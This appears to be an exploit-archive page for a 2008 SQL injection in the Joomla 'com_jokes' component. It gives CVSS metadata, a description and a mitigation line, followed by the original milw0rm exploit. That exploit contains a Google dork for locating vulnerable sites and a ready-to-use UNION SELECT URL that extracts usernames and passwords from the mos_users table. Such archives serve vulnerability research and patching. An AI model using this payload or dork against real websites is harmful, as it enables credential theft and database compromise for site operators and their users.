joomla SQL Injection(com_jokes)

vendor:

jokes

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: jokes

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: N/A

CPE: a:atapin:jokes

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

joomla SQL Injection(com_jokes)

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The attacker can inject arbitrary SQL code in the vulnerable parameter 'cat' of the 'index.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. This can be exploited to disclose the content of the database, modify data, delete data, or even execute system commands.

Mitigation:

The vendor has released an update to address this issue. Users are advised to upgrade to the latest version.

Source

Exploit-DB raw data:

#########################################################################
#
# joomla SQL Injection(com_jokes)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_jokes"
#
########################################################################
EXPLOIT :

index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*

#########################################################################
# S@BUN                    www.hackturkiye.com                        S@BUN
#########################################################################
# S@BUN                             GOOD LUCKY                        S@BUN
#########################################################################


  <mosinstall type="component">
    <name>jokes</name>
    <creationDate>29/12/2005</creationDate>
    <author>Atapin</author>
    <copyright>Released under the GNU/GPL License</copyright>
    <authorEmail>info@atapin.net</authorEmail>

    <authorUrl>www.atapin.net</authorUrl>
    <version>1.0</version>
    <description></description>

# milw0rm.com [2008-01-30]